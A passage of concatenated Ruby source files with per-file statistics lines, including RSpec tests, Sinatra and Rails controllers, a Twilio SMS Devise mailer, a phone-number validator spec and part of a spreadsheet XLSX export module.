(expect res.exitstatus).to be 0
(expect out).to be_empty
(expect err).to be_empty
pdfmark_file = Pathname.new output_file 'book.pdfmark'
(expect pdfmark_file).to exist
pdfmark_contents = pdfmark_file.read
(expect pdfmark_contents).to include '/Title (Book Title)'
(expect pdfmark_contents).to include '/Author (Author Name)'
(expect pdfmark_contents).to include '/DOCINFO pdfmark'
end
end
context 'keep artifacts' do
it 'should generate scratch file if KEEP_ARTIFACTS environment variable is set', cli: true do
out, err, res = run_command asciidoctor_pdf_bin, '-D', output_dir, (fixture_file 'dry-run-block.adoc'), env: { 'KEEP_ARTIFACTS' => 'true' }
(expect res.exitstatus).to be 0
(expect out).to be_empty
(expect err).to be_empty
scratch_file = Pathname.new output_file 'dry-run-block-scratch.pdf'
(expect scratch_file).to exist
(expect { PDF::Reader.new scratch_file }).not_to raise_exception
end
end
end
| 45.094737 | 153 | 0.692577 |
ab89456902532978204c7076052050c8aff6f65b | 1,150 | # frozen_string_literal: true
require 'spec_helper'
module GraphqlRails
module Model
RSpec.describe BuildGraphqlInputType do
subject(:builder) { described_class.new(name: name, description: description, attributes: attributes) }
let(:name) { 'DummyInput' }
let(:description) { 'This is dummy input' }
let(:attributes) do
{
id: GraphqlRails::Attributes::InputAttribute.new(:id),
full_name: GraphqlRails::Attributes::InputAttribute.new(:full_name!)
}
end
describe '#call' do
subject(:call) { builder.call }
it 'returns graphql input class' do
expect(call < ::GraphQL::Schema::InputObject).to be true
end
it 'sets correct name' do
expect(call.graphql_name).to eq name
end
it 'sets correct description' do
expect(call.description).to eq description
end
it 'sets correct attributes', :aggregate_failures do
expect(call.arguments['fullName'].type).to be_non_null
expect(call.arguments['id'].type).not_to be_non_null
end
end
end
end
end
| 27.380952 | 109 | 0.630435 |
397a1f24585556d32892faae9b1f735c35a62d15 | 97 | require 'dry-struct'
module OmniScrapperOutput
module Types
include Dry.Types()
end
end
| 12.125 | 25 | 0.742268 |
1d546eec8dea36bbaa9d0ce246bd2c94122c5ad6 | 1,125 | get '/decks/:deck_id/cards' do
@deck = Deck.find(params[:deck_id])
@game = @deck.game_for_user(current_user)
@cards = @deck.cards.study_order
haml :'cards/index'
end
get '/decks/:deck_id/cards/new' do
@deck = current_user.created_decks.find(params[:deck_id])
haml :'cards/new'
end
get '/decks/:deck_id/cards/:card_id/edit' do
@deck = Deck.find(params[:deck_id])
@card = current_user.created_cards.find(params[:card_id])
haml :'cards/edit'
end
post '/decks/:deck_id/cards' do
card = Card.create(params[:card].merge(creator_id: current_user.id, deck_id: params[:deck_id]))
if request.xhr?
haml :'cards/_row', locals: { card: card, deck: Deck.find(params[:deck_id]) }, layout: false
else
redirect "/decks/#{params[:deck_id]}/cards"
end
end
put '/decks/:deck_id/cards/:card_id' do
card = current_user.created_cards.find(params[:card_id])
card.update(params[:card])
redirect "/decks/#{params[:deck_id]}/cards"
end
delete '/decks/:deck_id/cards/:card_id' do
card = current_user.created_cards.find(params[:card_id])
card.destroy
redirect "/decks/#{params[:deck_id]}/cards"
end
| 26.162791 | 97 | 0.704 |
38deeb3b68d029088c3d9d5d5b3ac65e1a185876 | 60 | puts "Enter Your Name"
name = gets.chomp
puts "Hi, #{name}"
| 15 | 22 | 0.666667 |
ac5018af6a71d09df181ff1a4fa39c779e8be1c4 | 3,461 | require 'net/http'
class NodesController < ApplicationController
before_action :set_node, only: %i[show edit update destroy]
# GET /nodes
# GET /nodes.json
def index
@nodes = Node.all
end
# GET /nodes/1
# GET /nodes/1.json
def show; end
# GET /nodes/new
def new
@node = Node.new
end
# GET /nodes/1/edit
def edit; end
def register; end
def sync
@node = Node.find(params[:id])
@blocks = parse_blocks fetch_blocks(@node)
ours = Chain.new(Block.all)
theirs = Chain.new(@blocks)
if theirs.is_hash_valid?
merged = ours.merge theirs
logger.info merged
message = merged ? 'Our Chain was successfully synced from Node.' : 'Our Chain is up to date.'
render :show, notice: 'message'
else
render :show, alert: 'Node had invalid chain.'
end
end
# POST /nodes
# POST /nodes.json
def create
@node = Node.new(node_params)
respond_to do |format|
if @node.save
Event.post_new_node(@node)
format.html { redirect_to @node, notice: 'Node was successfully created.' }
format.json { render :show, status: :created, location: @node }
else
format.html { render :new }
format.json { render json: @node.errors, status: :unprocessable_entity }
end
end
end
# PATCH/PUT /nodes/1
# PATCH/PUT /nodes/1.json
def update
respond_to do |format|
if @node.update(node_params)
format.html { redirect_to @node, notice: 'Node was successfully updated.' }
format.json { render :show, status: :ok, location: @node }
else
format.html { render :edit }
format.json { render json: @node.errors, status: :unprocessable_entity }
end
end
end
# DELETE /nodes/1
# DELETE /nodes/1.json
def destroy
@node.destroy
respond_to do |format|
format.html { redirect_to nodes_url, notice: 'Node was successfully destroyed.' }
format.json { head :no_content }
end
end
private
# Use callbacks to share common setup or constraints between actions.
def set_node
@node = Node.find(params[:id])
end
# Never trust parameters from the scary internet, only allow the white list through.
def node_params
params.require(:node).permit(:available, :host, :node_id)
end
def parse_blocks(chain_data)
blocks_data = chain_data['blocks']
blocks = []
blocks_data.each do |block|
block['block_index'] = block.delete('index')
block['previous_block_hash'] = block.delete('previousBlockHash')
block['timestamp'] = Time.at(block.delete('timestamp'))
transactions = parse_transactions block.delete('transactions')
new_block = Block.new(block)
new_block.transactions = transactions
blocks << new_block
end
blocks
end
def parse_transactions(transactions_data)
transactions = []
transactions_data.each do |transaction|
transaction['transaction_id'] = transaction.delete('id')
transaction['timestamp'] = Time.at(transaction.delete('timestamp'))
transactions << Transaction.new(transaction)
end
transactions
end
def fetch_blocks(node)
uri = URI.parse("#{node.host}/blocks")
http = Net::HTTP.new(uri.host, uri.port)
request = Net::HTTP::Get.new(uri.request_uri)
request.initialize_http_header('Accept' => 'application/json')
response = http.request(request)
data = response.body
JSON.parse(data)
end
end
| 26.623077 | 100 | 0.658191 |
ed063aafbcb3407c38d8d676297374cec44128b7 | 1,239 | class AuthenticationMailer < Devise::Mailer
helper :application
include Devise::Controllers::UrlHelpers
def reset_password_instructions(record, token, opts={})
link_to_reset_password = edit_password_url(record, reset_password_token: token)
twilio_client.messages.create(
from: ENV["TWILIO_APP_PHONE_NUMBER"],
to: record.phone_number,
body: "Call for Practice: Click to set your password. #{link_to_reset_password}"
)
end
def confirmation_instructions(record, token, opts={})
link_to_confirm = confirmation_url(record, confirmation_token: token)
twilio_client.messages.create(
from: ENV["TWILIO_APP_PHONE_NUMBER"],
to: record.phone_number,
body: "Call for Practice: Click to confirm your phone number. #{link_to_confirm}"
)
end
def unlock_instructions(record, token, opts={})
link_to_unlock = unlock_url(record, unlock_token: token)
twilio_client.messages.create(
from: ENV["TWILIO_APP_PHONE_NUMBER"],
to: record.phone_number,
body: "Call for Practice: Click to unlock your account. #{link_to_unlock}"
)
end
private
def twilio_client
Twilio::REST::Client.new(ENV["TWILIO_ACCOUNT_SID"], ENV["TWILIO_AUTH_TOKEN"])
end
end
| 31.769231 | 87 | 0.728006 |
263abb360f684fb73d8c899530b071ccc36ec172 | 964 | module Importex
class Column
attr_reader :name
def initialize(name, options = {})
@name = name
@type = options[:type]
@format = [options[:format]].compact.flatten
@required = options[:required]
end
def cell_value(str, row_number)
validate_cell(str)
@type ? @type.importex_value(str) : str
rescue InvalidCell => e
raise InvalidCell, "#{str} (column #{name}, row #{row_number+1}) does not match required format: #{e.message}"
end
def validate_cell(str)
if @format && [email protected]? && [email protected]? { |format| match_format?(str, format) }
raise InvalidCell, @format.reject { |r| r.kind_of? Proc }.inspect
end
end
def match_format?(str, format)
case format
when String then str == format
when Regexp then str =~ format
when Proc then format.call(str)
end
end
def required?
@required
end
end
end
| 25.368421 | 116 | 0.602697 |
f7ec1b1ae429d958e70559201ac821c4b5fdfe81 | 4,196 | require 'spec_helper'
describe Volt::PhoneNumberValidator do
subject { Volt::PhoneNumberValidator.new(*params) }
let(:params) { [model, field_name, options] }
let(:model) { Volt::Model.new phone_number: phone_number }
let(:field_name) { :phone_number }
let(:options) { true }
let(:valid_us_number) { '(123)-123-1234' }
let(:valid_intl_number) { '+12 123 123 1234' }
let(:invalid_number) { '1234-123-123456' }
let(:phone_number) { valid_us_number }
describe '.validate' do
let(:result) { described_class.validate(*params.dup.insert(1, nil)) }
before do
allow(described_class).to receive(:new).and_return subject
allow(subject).to receive(:errors).and_call_original
result
end
it 'initializes a phone number validator with the provided arguments' do
expect(described_class).to have_received(:new).with(*params)
end
it 'calls errors on the phone number validator' do
expect(subject).to have_received :errors
end
it 'returns the result of calling errors on the validator' do
expect(subject.errors).to eq result
end
end
describe '#valid?' do
context 'when using the default regex' do
let(:options) { true }
context 'when the phone number is a valid US number' do
let(:phone_number) { valid_us_number }
specify { expect(subject.valid?).to eq true }
end
context 'when the phone number is a valid international number' do
let(:phone_number) { valid_intl_number }
specify { expect(subject.valid?).to eq true }
end
context 'when the phone number uses dashes' do
let(:phone_number) { '123-123-1234' }
specify { expect(subject.valid?).to eq true }
end
context 'when the phone number uses periods' do
let(:phone_number) { '123.123.1234' }
specify { expect(subject.valid?).to eq true }
end
context 'when the phone number uses spaces' do
let(:phone_number) { '123 123 1234' }
specify { expect(subject.valid?).to eq true }
end
context 'when the phone number uses parentheses and a space' do
let(:phone_number) { '(123) 123.1234' }
specify { expect(subject.valid?).to eq true }
end
context 'when an international number uses a plus' do
let(:phone_number) { '+12 123 123 1234' }
specify { expect(subject.valid?).to eq true }
end
context 'when an international number does not use a plus' do
let(:phone_number) { '12 123 123 1234' }
specify { expect(subject.valid?).to eq true }
end
context 'when an international number is from the UK' do
let(:phone_number) { '+12 123 1234 1234' }
specify { expect(subject.valid?).to eq true }
end
end
context 'when using a custom regex' do
let(:options) { { with: /\d{10}/ } }
context 'and the phone number qualifies' do
let(:phone_number) { '1231231234' }
specify { expect(subject.valid?).to eq true }
end
context 'and the phone number does not qualify' do
let(:phone_number) { '123-123-1234' }
specify { expect(subject.valid?).to eq false }
end
end
end
describe '#errors' do
context 'when the model has a valid phone number' do
let(:phone_number) { valid_us_number }
it 'returns an empty error hash' do
expect(subject.errors).to eq({})
end
end
context 'when the model has an invalid phone number' do
let(:phone_number) { invalid_number }
it 'returns an array of errors for phone number' do
expect(subject.errors).to eq(
phone_number: ['must be a phone number with area or country code'])
end
end
context 'when provided a custom error message' do
let(:options) { { message: custom_message } }
let(:custom_message) { 'this is a custom message' }
context 'and the phone number is invalid' do
let(:phone_number) { invalid_number }
it 'returns errors with the custom message' do
expect(subject.errors).to eq(phone_number: [custom_message])
end
end
end
end
end
| 28.544218 | 77 | 0.635844 |
e2b57b36d1a040a7e47c18d28a74d6de279453fd | 215 | require "google/cloud/language"
class GoogleDriveWrapper
attr_reader :client
def initialize
@client = Google::Cloud::Language.new(credentials: JSON.parse(ENV["GOOGLE_CREDENTIALS"]))
end
end
| 19.545455 | 97 | 0.716279 |
bfada4e921022b6333dada739d3c87572f3ed5dd | 656 | # frozen_string_literal: true
# This model represents the 'site-config' content type in Contentful. Any linked
# entries of the 'site-config' content type will be resolved as instances of this class.
# It exposes .find, .find_by, and .find_all methods to query Contentful.
class SiteConfig < WCC::Contentful::Model::SiteConfig
# Override functionality or add utilities
#
# # Example: override equality
# def ===(other)
# ...
# end
#
# # Example: override "title" attribute to always be titlecase.
# # `@title` is populated by the gem in the initializer.
# def title
# @title_titlecased ||= @title.titlecase
# end
end
| 32.8 | 88 | 0.696646 |
1a7317cf51604008c6c53d71f36022eb4660ceba | 942 | # encoding: utf-8
require File.expand_path('spec_helper', File.dirname(__FILE__))
describe "Links" do
before :each do
browser.goto(WatirSpec.files + "/non_control_elements.html")
end
describe "#length" do
it "returns the number of links" do
browser.links.length.should == 4
end
end
describe "#[]" do
it "returns the link at the given index" do
browser.links[3].id.should == "link_3"
end
it "returns a Link object also when the index is out of bounds" do
browser.links[2000].should_not be_nil
end
end
describe "#each" do
it "iterates through links correctly" do
index = 0
browser.links.each do |c|
index += 1
c.name.should == browser.link(:index, index).name
c.id.should == browser.link(:index, index).id
c.value.should == browser.link(:index, index).value
end
browser.links.length.should == index
end
end
end
| 23.55 | 70 | 0.641189 |
1c0a1e0ee2d93587dee68d7de7c4ab6b5c9cb014 | 4,385 | # Cookbook:: splunk_otel_collector
# Recipe:: default
ruby_block 'splunk-access-token-unset' do
block do
raise "Set ['splunk_access_token']['splunk_access_token'] as an attribute or on the node's run_state."
end
only_if { node['splunk_otel_collector']['splunk_access_token'].nil? }
end
if platform_family?('windows')
include_recipe 'splunk_otel_collector::collector_win_install'
include_recipe 'splunk_otel_collector::collector_win_registry'
directory ::File.dirname(node['splunk_otel_collector']['collector_config_dest']) do
action :create
end
template node['splunk_otel_collector']['collector_config_dest'] do
source 'agent_config.yaml.erb'
only_if { node['splunk_otel_collector']['collector_config'] != {} }
notifies :restart, 'windows_service[splunk-otel-collector]', :delayed
end
remote_file node['splunk_otel_collector']['collector_config_dest'] do
source "#{node['splunk_otel_collector']['collector_config_source']}"
only_if { node['splunk_otel_collector']['collector_config'] == {} }
notifies :restart, 'windows_service[splunk-otel-collector]', :delayed
end
windows_service 'splunk-otel-collector' do
service_name node['splunk_otel_collector']['service_name']
action [:enable, :start]
end
if node['splunk_otel_collector']['with_fluentd'] != false
include_recipe 'splunk_otel_collector::fluentd_win_install'
end
elsif platform_family?('debian', 'rhel', 'amazon', 'suse')
if platform_family?('debian')
package %w(apt-transport-https gnupg)
include_recipe 'splunk_otel_collector::collector_deb_repo'
elsif platform_family?('rhel', 'amazon')
package %w(libcap)
include_recipe 'splunk_otel_collector::collector_yum_repo'
elsif platform_family?('suse')
package %w(libcap-progs)
include_recipe 'splunk_otel_collector::collector_zypper_repo'
end
package 'splunk-otel-collector' do
action :install
version node['splunk_otel_collector']['collector_version'] if node['splunk_otel_collector']['collector_version'] != 'latest'
flush_cache [ :before ] if platform_family?('amazon', 'rhel')
options '--allow-downgrades' if platform_family?('debian') \
&& node['packages'] \
&& node['packages']['apt'] \
&& Gem::Version.new(node['packages']['apt']['version'].split('~')[0]) >= Gem::Version.new('1.1.0')
allow_downgrade true if platform_family?('amazon', 'rhel', 'suse')
notifies :restart, 'service[splunk-otel-collector]', :delayed
end
include_recipe 'splunk_otel_collector::collector_service_owner'
directory ::File.dirname(node['splunk_otel_collector']['collector_config_dest']) do
action :create
end
template node['splunk_otel_collector']['collector_config_dest'] do
source 'agent_config.yaml.erb'
owner node['splunk_otel_collector']['user']
group node['splunk_otel_collector']['group']
mode '0600'
only_if { node['splunk_otel_collector']['collector_config'] != {} }
notifies :restart, 'service[splunk-otel-collector]', :delayed
end
remote_file node['splunk_otel_collector']['collector_config_dest'] do
source "#{node['splunk_otel_collector']['collector_config_source']}"
owner node['splunk_otel_collector']['user']
group node['splunk_otel_collector']['group']
mode '0600'
only_if { node['splunk_otel_collector']['collector_config'] == {} }
notifies :restart, 'service[splunk-otel-collector]', :delayed
end
template '/etc/otel/collector/splunk-otel-collector.conf' do
source 'splunk-otel-collector.conf.erb'
owner node['splunk_otel_collector']['user']
group node['splunk_otel_collector']['group']
mode '0600'
notifies :restart, 'service[splunk-otel-collector]', :delayed
end
service 'splunk-otel-collector' do
service_name node['splunk_otel_collector']['service_name']
action [:enable, :start]
end
if node['splunk_otel_collector']['with_fluentd'] != false
if platform_family?('debian') && node['lsb']['codename'] != 'jammy'
include_recipe 'splunk_otel_collector::fluentd_deb_repo'
include_recipe 'splunk_otel_collector::fluentd_linux_install'
elsif platform_family?('rhel', 'amazon')
include_recipe 'splunk_otel_collector::fluentd_yum_repo'
include_recipe 'splunk_otel_collector::fluentd_linux_install'
end
end
else
raise "Platform family #{platform_family} not supported."
end
| 38.80531 | 128 | 0.729532 |
622049246b929a388c2641950427fbc501b8b277 | 1,159 | Pod::Spec.new do |m|
version = '5.7.0-alpha.1'
m.name = 'Mapbox-iOS-SDK'
m.version = version
m.summary = 'Open source vector map solution for iOS with full styling capabilities.'
m.description = 'Open source, OpenGL-based vector map solution for iOS with full styling capabilities and Cocoa Touch APIs.'
m.homepage = 'https://docs.mapbox.com/ios/maps/'
m.license = { :type => 'BSD', :file => 'LICENSE.md' }
m.author = { 'Mapbox' => '[email protected]' }
m.screenshot = "https://docs.mapbox.com/ios/api/maps/#{version}/img/screenshot.png"
m.social_media_url = 'https://twitter.com/mapbox'
m.documentation_url = 'https://docs.mapbox.com/ios/api/maps/'
m.source = {
:http => "https://mapbox.s3.amazonaws.com/mapbox-gl-native/ios/builds/mapbox-ios-sdk-#{m.version.to_s}-dynamic.zip",
:flatten => true
}
m.platform = :ios
m.ios.deployment_target = '9.0'
m.requires_arc = true
m.vendored_frameworks = 'dynamic/Mapbox.framework'
m.module_name = 'Mapbox'
m.preserve_path = '**/*.bcsymbolmap'
m.dependency "MapboxMobileEvents", "0.10.2"
end
| 34.088235 | 132 | 0.640207 |
61b310e796854314799d2fa713b24f06cdd00cb3 | 874 | require_relative 'params'
module Twizo
class WidgetParams < Params
attr_accessor :allowed_types, :recipient, :backup_code_identifier, :token_length, :token_type, :body_template, :sender, :sender_ton, :sender_npi, :tag, :dcs
# @return [Object]
def to_json
json = {
:allowedTypes => allowed_types,
:recipient => recipient,
:backupCodeIdentifier => backup_code_identifier,
:tokenLength => token_length,
:tokenType => token_type,
:bodyTemplate => body_template,
:sender => sender,
:senderTon => sender_ton,
:senderNpi => sender_npi,
:tag => tag,
:dcs => dcs
}
json.to_json
end
end
end | 29.133333 | 160 | 0.503432 |
184aecc3be721df2ef6f92506500daf03aaa5653 | 806 | class SizedArray < Array
attr_reader :capacity
def initialize( capacity = 10, *args )
@capacity = capacity
super( *args )
end
def resize
if size > @capacity
slice!( (0...-@capacity) )
end
end
private :resize
def concat( other_array )
super( other_array )
resize
self
end
def fill( *args )
retval = super( *args )
resize
self
end
def <<( item )
retval = super( item )
if size > @capacity
retval = shift
end
retval
end
def push( item )
self << item
end
def unshift( item )
retval = super( item )
if size > @capacity
retval = pop
end
retval
end
end
| 16.44898 | 42 | 0.478908 |
182c4d4eeeeb70dd6694f57567eaca08c9bcfe65 | 201 | # Simple, obvious (to me) way to do it.
(1..100).each do |n|
case
when n % 15 == 0 : puts 'FizzBuzz'
when n % 5 == 0 : puts 'Buzz'
when n % 3 == 0 : puts 'Fizz'
else puts n
end
end
| 20.1 | 39 | 0.527363 |
ed9007a08858f3ff76f1db9a1ff0f7a7bf660b4b | 707 | Pod::Spec.new do |s|
s.name = 'AWSPolly'
s.version = '2.11.1'
s.summary = 'Amazon Web Services SDK for iOS.'
s.description = 'The AWS SDK for iOS provides a library, code samples, and documentation for developers to build connected mobile applications using AWS.'
s.homepage = 'http://aws.amazon.com/mobile/sdk'
s.license = 'Apache License, Version 2.0'
s.author = { 'Amazon Web Services' => 'amazonwebservices' }
s.platform = :ios, '8.0'
s.source = { :git => 'https://github.com/aws/aws-sdk-ios.git',
:tag => s.version}
s.requires_arc = true
s.dependency 'AWSCore', '2.11.1'
s.source_files = 'AWSPolly/*.{h,m}'
end
| 39.277778 | 157 | 0.609618 |
f71a3f08705d90384109c36eb3203b8d22946c78 | 1,251 | require "test_helper"
require_relative "signature_helper"
class TracerTest < Minitest::Test
include SignatureHelper
class X
def foo(x, y)
x
end
def bar()
nil
end
end
def test_learn
lib = Argtrace::TypeLib.new
lib.learn(signature_from(X, :foo, {x: [String], y: [Integer]}, [String]))
lib.learn(signature_from(X, :foo, {x: [String], y: [Integer]}, [String]))
lib.learn(signature_from(X, :bar, {}, [NilClass]))
lib.learn(signature_from(X, :bar, {}, [TrueClass]))
lib.learn(signature_from(X, :bar, {}, [FalseClass]))
ans_foo_params = params_from({x: [String], y: [Integer]})
ans_foo_ret = typeunion_from([String])
assert_equal 2, lib.lib[X][:foo][0].params.size
assert_equal_typeunion ans_foo_params[0].type, lib.lib[X][:foo][0].params[0].type
assert_equal_typeunion ans_foo_params[1].type, lib.lib[X][:foo][0].params[1].type
assert_equal_typeunion ans_foo_ret, lib.lib[X][:foo][0].return_type
ans_bar_ret = typeunion_from([NilClass, TrueClass])
assert_equal 0, lib.lib[X][:bar][0].params.size
assert_equal_typeunion ans_bar_ret, lib.lib[X][:bar][0].return_type
end
end
class OutputModuleTest < Minitest::Test
def test_add_signature
end
end | 29.093023 | 85 | 0.677858 |
182683bcf305bb6a9baface29ec532f23319b1d8 | 146 | require "test_helper"
class Api::V1::FactsControllerTest < ActionDispatch::IntegrationTest
# test "the truth" do
# assert true
# end
end
| 18.25 | 68 | 0.726027 |
e264cf32a35f509d81f38d9d460a0f6627adcd97 | 270 | class ApplicationController < ActionController::Base
protect_from_forgery with: :exception
include SessionsHelper
def user_should_have_logged_in
return if logged_in?
store_location
flash[:danger] = "Please login."
redirect_to login_url
end
end
| 20.769231 | 52 | 0.77037 |
62e01f1002cd809002a4624a8b9b864f009067b7 | 1,183 | # Copyright 2014 Square Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
describe Screenshot do
it { should have_attached_file(:image) }
it { should validate_attachment_presence(:image) }
it { should validate_attachment_content_type(:image).allowing(Screenshot::CONTENT_TYPES) }
it { should validate_attachment_size(:image).less_than(5.megabytes) }
it 'creates a thumbs style' do
expect(Screenshot.attachment_definitions[:image][:styles][:thumb]).to_not be_nil
end
it 'creates a dimensions for thumbs style' do
expect(Screenshot.attachment_definitions[:image][:styles][:thumb]).to eql('400x200')
end
end
| 38.16129 | 92 | 0.743872 |
b92b13ef34c5c5dbc98f53353f7188b087792577 | 4,875 | require 'test_helper'
class InspireTest < Test::Unit::TestCase
include CommStub
def setup
@gateway = InspireGateway.new(
:login => 'LOGIN',
:password => 'PASSWORD'
)
@credit_card = credit_card('4242424242424242')
@amount = 100
@options = { :billing_address => address }
end
def test_successful_purchase
@gateway.expects(:ssl_post).returns(successful_purchase_response)
assert response = @gateway.authorize(@amount, @credit_card, @options)
assert_instance_of Response, response
assert_success response
assert_equal '510695343', response.authorization
end
def test_failed_purchase
@gateway.expects(:ssl_post).returns(failed_purchase_response)
assert response = @gateway.authorize(@amount, @credit_card, @options)
assert_instance_of Response, response
assert_failure response
end
def test_successful_refund
response = stub_comms do
@gateway.refund(nil, 'identifier')
end.check_request do |_, data, _|
assert_match %r{identifier}, data
assert_no_match %r{amount}, data
end.respond_with(successful_refund_response)
assert_success response
end
def test_partial_refund
response = stub_comms do
@gateway.refund(100, 'identifier')
end.check_request do |_, data, _|
assert_match %r{identifier}, data
assert_match %r{amount}, data
end.respond_with(successful_refund_response)
assert_success response
end
def test_failed_refund
response = stub_comms do
@gateway.refund(nil, 'identifier')
end.respond_with(failed_refund_response)
assert_failure response
end
def test_add_address
result = {}
@gateway.send(:add_address, result, nil, :billing_address => {:address1 => '164 Waverley Street', :country => 'US', :state => 'CO'})
assert_equal ['address1', 'city', 'company', 'country', 'phone', 'state', 'zip'], result.stringify_keys.keys.sort
assert_equal 'CO', result[:state]
assert_equal '164 Waverley Street', result[:address1]
assert_equal 'US', result[:country]
end
def test_supported_countries
assert_equal ['US'], InspireGateway.supported_countries
end
def test_supported_card_types
assert_equal [:visa, :master, :american_express], InspireGateway.supported_cardtypes
end
def test_adding_store_adds_vault_id_flag
result = {}
@gateway.send(:add_creditcard, result, @credit_card, :store => true)
assert_equal ['ccexp', 'ccnumber', 'customer_vault', 'cvv', 'firstname', 'lastname'], result.stringify_keys.keys.sort
assert_equal 'add_customer', result[:customer_vault]
end
def test_blank_store_doesnt_add_vault_flag
result = {}
@gateway.send(:add_creditcard, result, @credit_card, {})
assert_equal ['ccexp', 'ccnumber', 'cvv', 'firstname', 'lastname'], result.stringify_keys.keys.sort
assert_nil result[:customer_vault]
end
def test_accept_check
post = {}
check = Check.new(:name => 'Fred Bloggs',
:routing_number => '111000025',
:account_number => '123456789012',
:account_holder_type => 'personal',
:account_type => 'checking')
@gateway.send(:add_check, post, check)
assert_equal %w[account_holder_type account_type checkaba checkaccount checkname payment], post.stringify_keys.keys.sort
end
def test_funding_source
assert_equal :check, @gateway.send(:determine_funding_source, Check.new)
assert_equal :credit_card, @gateway.send(:determine_funding_source, @credit_card)
assert_equal :vault, @gateway.send(:determine_funding_source, '12345')
end
def test_avs_result
@gateway.expects(:ssl_post).returns(successful_purchase_response)
response = @gateway.purchase(@amount, @credit_card)
assert_equal 'N', response.avs_result['code']
end
def test_cvv_result
@gateway.expects(:ssl_post).returns(successful_purchase_response)
response = @gateway.purchase(@amount, @credit_card)
assert_equal 'N', response.cvv_result['code']
end
private
def successful_purchase_response
'response=1&responsetext=SUCCESS&authcode=123456&transactionid=510695343&avsresponse=N&cvvresponse=N&orderid=ea1e0d50dcc8cfc6e4b55650c592097e&type=sale&response_code=100'
end
def failed_purchase_response
'response=2&responsetext=DECLINE&authcode=&transactionid=510695919&avsresponse=N&cvvresponse=N&orderid=50357660b0b3ef16f72a3d3b83c46983&type=sale&response_code=200'
end
def successful_refund_response
'response=1&responsetext=SUCCESS&authcode=&transactionid=2594884528&avsresponse=&cvvresponse=&orderid=&type=refund&response_code=100'
end
def failed_refund_response
'response=3&responsetext=Invalid Transaction ID specified REFID:3150951931&authcode=&transactionid=&avsresponse=&cvvresponse=&orderid=&type=refund&response_code=300'
end
end
| 34.090909 | 174 | 0.730462 |
b941eab4f434c6c4a6449d1a2fe004d013a3b788 | 131 | module DmcKanye
class Config
class_attribute :script_to_disable_transitions
class_attribute :default_wait_time
end
end
| 18.714286 | 50 | 0.816794 |
11343bf2a4f979e81d0a0e58fa73cf69bc786404 | 9,379 | require 'axlsx'
require 'axlsx_styler'
require 'spreadsheet_architect/axlsx_string_width_patch'
module SpreadsheetArchitect
module ClassMethods
def to_xlsx(opts={})
return to_axlsx_package(opts).to_stream.read
end
def to_axlsx_package(opts={}, package=nil)
opts = SpreadsheetArchitect::Utils.get_options(opts, self)
options = SpreadsheetArchitect::Utils.get_cell_data(opts, self)
if options[:column_types] && !(options[:column_types].compact.collect(&:to_sym) - SpreadsheetArchitect::XLSX_COLUMN_TYPES).empty?
raise SpreadsheetArchitect::Exceptions::ArgumentError.new("Invalid column type. Valid XLSX values are #{SpreadsheetArchitect::XLSX_COLUMN_TYPES}")
end
header_style = SpreadsheetArchitect::Utils::XLSX.convert_styles_to_axlsx(options[:header_style])
row_style = SpreadsheetArchitect::Utils::XLSX.convert_styles_to_axlsx(options[:row_style])
if package.nil?
package = Axlsx::Package.new
end
row_index = -1
package.workbook.add_worksheet(name: options[:sheet_name]) do |sheet|
max_row_length = options[:data].empty? ? 0 : options[:data].max_by{|x| x.length}.length
if options[:headers]
header_style_index = package.workbook.styles.add_style(header_style)
options[:headers].each do |header_row|
row_index += 1
missing = max_row_length - header_row.count
if missing > 0
missing.times do
header_row.push(nil)
end
end
sheet.add_row header_row, style: header_style_index
if options[:conditional_row_styles]
conditional_styles_for_row = SpreadsheetArchitect::Utils::XLSX.conditional_styles_for_row(options[:conditional_row_styles], row_index, header_row)
unless conditional_styles_for_row.empty?
sheet.add_style(
"#{SpreadsheetArchitect::Utils::XLSX::COL_NAMES.first}#{row_index+1}:#{SpreadsheetArchitect::Utils::XLSX::COL_NAMES[max_row_length-1]}#{row_index+1}",
SpreadsheetArchitect::Utils::XLSX.convert_styles_to_axlsx(conditional_styles_for_row)
)
end
end
end
end
if options[:data].empty?
break
end
row_style_index = package.workbook.styles.add_style(row_style)
default_date_style_index = nil
default_time_style_index = nil
options[:data].each do |row_data|
row_index += 1
missing = max_row_length - row_data.count
if missing > 0
missing.times do
row_data.push(nil)
end
end
types = []
styles = []
row_data.each_with_index do |x,i|
if (x.respond_to?(:empty) ? x.empty? : x.nil?)
types[i] = nil
styles[i] = row_style_index
else
if options[:column_types]
types[i] = options[:column_types][i]
end
types[i] ||= SpreadsheetArchitect::Utils::XLSX.get_type(x)
if [:date, :time].include?(types[i])
if types[i] == :date
default_date_style_index ||= package.workbook.styles.add_style(row_style.merge({format_code: 'yyyy-mm-dd'}))
styles[i] = default_date_style_index
else
default_time_style_index ||= package.workbook.styles.add_style(row_style.merge({format_code: 'yyyy-mm-dd h:mm AM/PM'}))
styles[i] = default_time_style_index
end
else
styles[i] = row_style_index
end
end
end
sheet.add_row row_data, style: styles, types: types, escape_formulas: options[:escape_formulas]
if options[:conditional_row_styles]
options[:conditional_row_styles] = SpreadsheetArchitect::Utils.hash_array_symbolize_keys(options[:conditional_row_styles])
conditional_styles_for_row = SpreadsheetArchitect::Utils::XLSX.conditional_styles_for_row(options[:conditional_row_styles], row_index, row_data)
unless conditional_styles_for_row.empty?
sheet.add_style(
"#{SpreadsheetArchitect::Utils::XLSX::COL_NAMES.first}#{row_index+1}:#{SpreadsheetArchitect::Utils::XLSX::COL_NAMES[max_row_length-1]}#{row_index+1}",
SpreadsheetArchitect::Utils::XLSX.convert_styles_to_axlsx(conditional_styles_for_row)
)
end
end
end
if options[:column_widths]
sheet.column_widths(*options[:column_widths])
end
if options[:borders] || options[:column_styles] || options[:range_styles] || options[:merges]
num_rows = options[:data].count + (options[:headers] ? options[:headers].count : 0)
end
if options[:borders]
options[:borders] = SpreadsheetArchitect::Utils.hash_array_symbolize_keys(options[:borders])
options[:borders].each do |x|
if x[:range].is_a?(Hash)
x[:range] = SpreadsheetArchitect::Utils::XLSX.range_hash_to_str(x[:range], max_row_length, num_rows)
else
SpreadsheetArchitect::Utils::XLSX.verify_range(x[:range], num_rows)
end
sheet.add_border x[:range], (x[:border_styles] || x[:styles])
end
end
if options[:column_styles]
